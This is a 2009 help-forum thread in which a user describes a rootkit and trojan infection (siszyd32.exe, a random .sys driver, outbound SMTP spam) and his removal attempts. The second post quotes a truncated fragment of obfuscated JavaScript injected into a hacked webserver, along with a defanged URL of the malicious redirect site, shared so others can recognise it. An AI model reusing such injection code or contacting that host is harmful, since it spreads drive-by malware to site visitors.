Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Still infected with Agent.aagq?


  • Please log in to reply
1 reply to this topic

#1 kiwiwings

kiwiwings

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:06:16 AM

Posted 27 December 2009 - 08:35 PM

Hi,

since 24.12.2009 I was struggling with slow internet connection, blue screens and program aborts.
I also needed to reinstall Firefox, because the firefox.exe suddenly wasn't there anymore.
I did a mix of windows updates (.Net framework) and installing a numerous of tools like AVG, a-squarred, MS process monitor.
The tools found some files (*.exe,*.exe in Zips), which I haven't started for a long time and haven't been referenced
in the registry, but my original problem still existed.
One of the more interesting founds was the siszyd32.exe and ~tmp-something files.

In MS process monitor I saw SMTP-connections from a lot of different services even from the Idle task.
The first thing I did - after not finding the source for the problem - to use the ipsec windows filter to lock outbound port 25 calls.
My internet access was still slow, also I haven't checked explicitly for it, but it seemed that the process did a lot of syn-calls - showed via "netstat -an".
So today I've tried Sophos which couldn't check a .sys-file in windows/system32/drivers called jrgpijz.sys and also HijackThis had problems opening it.
After not finding anything about a file named like this in google, I thought that must be a malicous autogenerated file.
I've tried to start windows in safe mode with the network drivers or the command shell, but that resulted in a blue screen with an IRQ(L?) exception.
On one of the (normal) reboots, I tried to delete the file with a command prompt and saw, that it will be rewritten (first 0 bytes then either 704.512 or 702.512 bytes).
So I've read a bit more about the combofix solution in the other subforum and created that cfscript.txt,
which finally removed the service registry entry and the .sys-file.

After a chat with a friend we discovered, that we were parallel infected with the same stuff -
his .sys-file was called jikztvm.sys (maybe a j*.sys-pattern???) and also got that siszyd32.exe dropped in his autostart.
He told me, he uploaded it and
now AntiVir knows that trojan as Agent.aagq -
looks like a derivation of an existing version. He got rid of it using a linux partition.

Although I don't see any Port-25 accesses anymore, I still have that feeling that something is not right.
  • I.e. the process monitor tool has a GUI problem and can't display the founds anymore;
  • I've got a blue screen with an "mbr.sys"-error after the deletion of that .sys-file and a restart ... I'm not sure anymore, if I ran combofix.exe /u without restarting before that bluescreen though
Currently my system runs more or less ok - had a wlan drop before, but that happened also in former times.
(System-Ver: Microsoft Windows XP Professional 5.1.2600.3.1252.49.1031.18.2046.1370 with no MS updates to be added)

I googled a bit about that rootkit, but didn't find anything about the infection way.
Of course I'm practicing most of the Safe internet practices and
my friend is even more rigorous about that. Its just noticeable that users (maybe another friend too) with different kind of
usage behaviour suffer the same problem simultanously. The only contact we had in the last few days were ICQ and non-html emails via Thunderbird.

*EDIT* Ok, I've tried to execute RootRepeal, but it will crash when launched from the Desktop. Then I've started Dr.Web which found another thread (sendstatus.exe, userreg.exe).
Restarted - but RootRepeal still crashes */EDIT*
  • Is the rootkit related to the siszyd32.exe dropper?
    *EDIT* After browsing a bit more, it seems that more people here have the same problem - at least this post sounds familiar. Another post
  • Do you know where it comes from and how the infection takes place?
    *EDIT* Found a bit more of information here and here
  • Is it known for infecting other system files, e.g. mbr.sys?
I'll check this thread tomorrow till noon, but will be probably off until 03.01.2010, so please don't close it until then.

Thanks for the help,
Andreas.

Edited by kiwiwings, 28 December 2009 - 05:57 AM.


BC AdBot (Login to Remove)

 


#2 kiwiwings

kiwiwings
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:06:16 AM

Posted 28 December 2009 - 12:24 PM

Got it another time. This time I've noticed it before rebooting, but the siszyd32.exe was somehow locked and couldn't be removed, so I applied again the combofix trick.
Maybe there's a link between our hacked club webserver and the firefox abort just after I checked the pages.
The php was modifed with some obfuscated javascript which basically created a window.onload-redirect to some russian site.
I haven't dared to access it directly with firefox again, but I only got an empty response via wget - so maybe it's just a counter.

In case you wana check suspicous sites, the obfuscated javascript looks like
window.onload = function(){var W8aqeemj1o86 = document.createElement('s!@c^&#r)##!i....'.replace(/\!|#|\)|@|&|\^|\$|\(/ig, '')
in my case the forward was to ... replace (# with .):
http://sitesell-com#twitter#com#technorati-com#worldmusicmagazine#ru:8080/commentcamarche#net/commentcamarche#net/google#com/fishki#net/files#wordpress.com

Btw. a fast way of finding out, if you got infected with siszyd32.exe again is the MS AutoRun tool. It will show you if siszyd32.exe is again saved in your Autostart-Folder, which I didn't see with explorer or command line (because it will somehow hide itself from viewing)

Edited by kiwiwings, 28 December 2009 - 06:44 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users